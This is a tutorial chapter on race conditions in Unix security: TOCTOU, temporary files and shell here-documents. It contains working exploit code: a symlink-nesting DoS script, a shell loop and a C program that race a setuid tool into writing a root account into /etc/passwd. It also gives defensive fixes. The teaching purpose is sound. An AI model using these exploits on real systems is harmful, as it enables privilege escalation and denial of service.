
9. Race conditions

A race is a timing dependence between two events.

9.1 Time between test and execution

It is quite common to see code in the style

        if (doing_this_is_allowed)
                do_it();

Now suppose that we can set things up in such a way that at the moment of the test the world is still innocent, but at the moment of do_it() things have changed. Then even a somewhat careful program can be tricked into doing something that it shouldn't.

Such things seem difficult: only a few microseconds to play with. But there are methods to slow down time and turn microseconds into seconds.

Deep symlinks

An old trick is to use a filename with deeply nested symlinks. One can force the kernel to take an almost arbitrarily long time to access a single file. Below is a script by Rafal Wojtczuk, but the idea was known much earlier.

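#!/bin/sh
# by Nergal
mklink() {
  IND=$1
  NXT=$(($IND+1))
  EL=l$NXT/../
  # P becomes "l<IND+1>/../" repeated ELNUM times
  P=""
  I=0
  while [ $I -lt $ELNUM ] ; do
    P=$P"$EL"
    I=$(($I+1))
  done
  ln -s "$P"l$2 l$IND
}

if [ $# != 1 ] ; then
        echo A numerical argument is required.
        exit 1
fi

ELNUM=$1

mklink 4
mklink 3
mklink 2
mklink 1
mklink 0 /../../../../../../../etc/services
mkdir l5
mkdir l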

What does this do? Let us call the script mklink. A call ./mklink 3 creates the situation

drwxr-xr-x    2 aeb      4096  l
lrwxrwxrwx    1 aeb        53  l0 -> l1/../l1/../l1/../l/../../../../../../../etc/services
lrwxrwxrwx    1 aeb        19  l1 -> l2/../l2/../l2/../l
lrwxrwxrwx    1 aeb        19  l2 -> l3/../l3/../l3/../l
lrwxrwxrwx    1 aeb        19  l3 -> l4/../l4/../l4/../l
lrwxrwxrwx    1 aeb        19  l4 -> l5/../l5/../l5/../l
drwxr-xr-x    2 aeb      4096  l5
with two empty directories l and l5, and symlinks l1, l2, l3, l4 that hesitate 3 times where they want to go, but finally go to l, and a symlink l0 that hesitates 3 times where to go but finally goes to some arbitrary given file. Giving mklink some larger parameter causes symlinks that hesitate more. Some timing on a random machine of the command head -1 l0:
depth   time
5       0.02 sec
10      0.47 sec
15      3.3 sec
20      13.3 sec
25      39 sec
30      1 min 35 sec
35      3 min 23 sec

Exercise What is the expected time dependence on the depth?

With somewhat larger values for the depth one can make a single lookup take hours or even weeks. During this time no scheduling happens, so the machine is dead: an easy local DoS.

Linux kernels since 2.2.20/2.4.11 have a limit on the depth of nesting and on the total number of symlink dereferences allowed during a lookup to avoid this problem.
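
With such limits in place, a lookup that follows too many symlinks no longer hangs. It fails with the error ELOOP. A minimal sketch of how a program might notice this; the helper name lookup_hits_symlink_limit is made up for the illustration.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/* Hypothetical helper: returns 1 if opening `path` fails because the
 * kernel gave up following symlinks (ELOOP), and 0 otherwise. */
int lookup_hits_symlink_limit(const char *path)
{
        int fd;

        assert(path != NULL);
        fd = open(path, O_RDONLY);
        if (fd >= 0) {
                close(fd);
                return 0;
        }
        return errno == ELOOP;
}
```

A symlink that points to itself is the cheapest way to trigger the limit when trying this out.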

LD_DEBUG output throttling

Setting the environment variable LD_DEBUG to some value (try LD_DEBUG=help and LD_DEBUG=all) causes output to be generated to stderr. This will slow a program down. If stderr is redirected to a pipe, then the pipe will fill up quickly, and by reading cautiously from the other end one can slow down and stop a setuid binary at a given point.

Scheduling priority

Niceness values usually range from -20 to 19 or 20. Processes with negative niceness get high priority. Some CD burning programs like that. Processes with positive niceness get low priority, and often a process with niceness 19 or 20 only runs when nothing else in the system wants to. Starting a process with nice(19) will make it go really slow.
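
A process can also lower its own priority before it starts the victim, since a child inherits the niceness of its parent. A small sketch, assuming the POSIX setpriority() and getpriority() calls; the helper name lower_priority and the error value -100 are made up for the illustration.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <errno.h>
#include <sys/resource.h>

/* Hypothetical helper: set the niceness of the calling process to
 * `value` and return the niceness now in effect, or -100 on error.
 * An unprivileged process can only raise its niceness, so the call
 * fails if `value` is below the current niceness. */
int lower_priority(int value)
{
        int now;

        assert(value >= 0 && value <= 19);
        if (setpriority(PRIO_PROCESS, 0, value) != 0)
                return -100;
        errno = 0;      /* getpriority() may legitimately return -1 */
        now = getpriority(PRIO_PROCESS, 0);
        if (now == -1 && errno != 0)
                return -100;
        return now;
}
```

After lower_priority(19) anything started with fork() and exec() runs at niceness 19 as well.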

An exploit

Here is a 2003 SunOS at exploit by Wojciech Purczynski. It removes arbitrary files from the filesystem by calling at -r file. Now the setuid at is careful, and does a stat() to check that you are the owner of the file before removing it. But if time is slow, one can change the world between the stat(file) and unlink(file) system calls, and make file a symlink to the file one wants to remove.

A toy example

Look at the following silly baby program. It is setuid root, and will add a message with time stamp to a file, but only if the file is owned by the user. The interesting part of the source code goes

        if (stat(fname, &buf) != 0 || buf.st_uid != getuid())
                exit(1);        /* no such file, or not owned by the caller */
        f = fopen(fname, "a"); ...
So, there is a race here - the fname used in the fopen() may differ from the fname used in the stat().
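
One possible repair is to open the file first and do the ownership test on the open descriptor with fstat(), so that test and use refer to the same file. The sketch below is an illustration, not the author's code: the name open_if_owned is made up, the owner is passed in as a parameter where the toy program would use getuid(), and O_NOFOLLOW is assumed to be available.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical replacement for the stat()+fopen() pair: open first,
 * then check ownership on the descriptor. Returns NULL if the file
 * is refused or cannot be opened. */
FILE *open_if_owned(const char *fname, uid_t owner)
{
        struct stat buf;
        FILE *f;
        int fd;

        assert(fname != NULL);
        /* O_NOFOLLOW: fail if the last path component is a symlink */
        fd = open(fname, O_WRONLY | O_APPEND | O_NOFOLLOW);
        if (fd < 0)
                return NULL;
        /* fstat() looks at the file we actually opened, whatever the
         * name points to by now */
        if (fstat(fd, &buf) != 0 || !S_ISREG(buf.st_mode) ||
            buf.st_uid != owner) {
                close(fd);
                return NULL;
        }
        f = fdopen(fd, "a");
        if (f == NULL)
                close(fd);
        return f;
}
```

Swapping the symlink after the open() no longer helps the attacker, because the name is resolved only once.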

First exploit: hit at random and hope.

        touch myfile
        while true; do
                ln -sf ./myfile a &
                ./addmsg a 'w00t::0:0:w00t::/bin/bash' &
                ln -sf /etc/passwd a &
        done

This works on my machine, maybe once every 1 or 2 minutes on average. Details very much depend on what other activity there is on the machine.

Second exploit: use LD_DEBUG throttling.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

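int main() {
        char buf[1000];
        FILE *p;
        int done = 0;

        /* start with "a" pointing at a file we own */
        system("rm -f a; touch ./myfile");
        if (symlink("./myfile", "a")) {
                perror("first symlink");
                return 1;
        }
        /* run the victim with its debug output going into our pipe */
        p = popen("LD_DEBUG=all ./addmsg a ochoch 2>&1", "r");
        if (p == NULL) {
                fprintf(stderr, "cannot open pipe\n");
                return 1;
        }
        setbuf(p, NULL);
        while (fgets(buf, sizeof(buf), p)) {
                /* getuid is looked up after stat() has run: swap the link now */
                if (!done && strstr(buf, "getuid")) {
                        unlink("a");    /* symlink() fails if "a" still exists */
                        if (symlink("/etc/passwd", "a")) {
                                perror("second symlink");
                                return 1;
                        }
                        done = 1;
                }
        }
        pclose(p);
        return 0;
}
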
This is a precision exploit. No random hitting. It just works. (Unfortunately LD_DEBUG is no longer honoured in setuid binaries since glibc 2.3.4.)


A famous exploit involving a race was published by h00lyshit. See below.

9.2 Temporary files

Many programs make use of temporary files with predictable names. They create them, write to them, read them and remove them. Creative use of symlinks in /tmp may trick such a program into executing arbitrary commands, or into removing arbitrary files.

This may be a straightforward bug, no timing involved, if the temporary file has a fixed name like /tmp/foo.tmp or /tmp/shtmp$$ (where $$ will be expanded to the process ID) and the name is used without testing.

It becomes a race if before use either the program tests that no such name exists already, or the program removes any such file.
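
A common way to avoid both the bug and the race is to let mkstemp() choose the name and create the file in one step. A minimal sketch; the helper name make_private_temp and the template /tmp/example.XXXXXX are made up for the illustration.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper: create a fresh temporary file and return an
 * open descriptor, or -1 on failure. `name` is a buffer of `size`
 * bytes that receives the generated path. */
int make_private_temp(char *name, size_t size)
{
        static const char template[] = "/tmp/example.XXXXXX";

        assert(name != NULL);
        if (size < sizeof(template))
                return -1;
        memcpy(name, template, sizeof(template));
        /* mkstemp() replaces the XXXXXX and creates the file with
         * O_CREAT|O_EXCL, so an existing name or a planted symlink
         * is never reused */
        return mkstemp(name);
}
```

The caller gets a descriptor for a file that did not exist before, and can unlink(name) as soon as the name is no longer needed.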

sh redirection

In 2000 it was noticed that many incarnations of the shell (sh, ksh, tcsh, ...) create temporary files in an insecure way. For example, so-called here-documents are pieces of text in a shell script that are to be fed to some command. One writes

command << EOI
some text
more text
EOI

The shell implements here-documents by writing the text to a temporary file, opening it, giving the file descriptor to the command as stdin, and removing the file again when the command has finished (or even before the command is started, keeping the open file descriptor as the only reference). If symlinks are in place before the shell is used (say, via a script invoked by root), one can overwrite arbitrary files or do other interesting things.

On recent systems this has of course been fixed. Let us investigate (SunOS 5.7).

% echo $$
% ls -l /tmp << EOI
total 48
-rw-r--r--   1 aeb      4 Apr  1 16:34 sh15121
% ls -l /tmp << EOI
total 48
-rw-r--r--   1 aeb      4 Apr  1 16:34 sh15122
% ln -s /tmp/foo /tmp/sh15123
% ls -l /tmp << EOI
total 64
-rw-r--r--   1 aebr     4 Apr  1 16:36 sh15124
lrwxrwxrwx   1 aebr     8 Apr  1 16:35 sh15123 -> /tmp/foo
% truss sh
read(0, 0x00038770, 128)        (sleeping...)
date << EOI
read(0, " d a t e   < <   E O I\n", 128)        = 12
open64("/tmp/sh19450", O_RDWR|O_CREAT|O_EXCL, 0666) = 3
read(0, 0x00038770, 128)        (sleeping...)
read(0, " E O I\n", 128)                        = 4
fork()                                          = 1946
unlink("/tmp/sh19450")                          = 0
That is, on this system here-documents are called /tmp/sh$$N, where $$ is the PID of the shell, and N is a counter. They are opened with the flags O_RDWR|O_CREAT|O_EXCL, and the O_EXCL part makes sure that the file did not exist already. If it exists, N is incremented.
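
The same idea can be sketched in C. This is not the shell's code, only an illustration of the scheme visible in the trace: the name create_counted_temp and the limit of 1000 attempts are made up, and the mode is 0600 where the trace shows 0666.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Hypothetical helper: try prefix0, prefix1, ... until one of the
 * names can be created exclusively. Returns an open descriptor and
 * leaves the name in `name`, or returns -1 on failure. */
int create_counted_temp(const char *prefix, char *name, size_t size)
{
        int n, len, fd;

        assert(prefix != NULL && name != NULL);
        for (n = 0; n < 1000; n++) {
                len = snprintf(name, size, "%s%d", prefix, n);
                if (len < 0 || (size_t)len >= size)
                        return -1;      /* name does not fit */
                /* with O_CREAT|O_EXCL open() fails with EEXIST if the
                 * name exists, even as a dangling symlink */
                fd = open(name, O_RDWR | O_CREAT | O_EXCL, 0600);
                if (fd >= 0)
                        return fd;
                if (errno != EEXIST)
                        return -1;
        }
        return -1;
}
```

A symlink planted at the first name is skipped and its target is left untouched, which is what the ln -s experiment above shows for the shell.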

By the way, the program truss that we used here is an extremely powerful tool to find out what a program is doing.

Let us try again on a Linux machine. We see with strace (the Linux analog of truss):

open("/tmp/sh-thd-1073814528", O_WRONLY|O_CREAT|O_TRUNC|O_EXCL|O_LARGEFILE, 0600) = 3
... here-document is written ...
open("/tmp/sh-thd-1073814528", O_RDONLY|O_LARGEFILE) = 4
unlink("/tmp/sh-thd-1073814528") = 0
dup2(4, 0)                  = 0
So here the temporary here-document is unlinked already before invocation of the command.
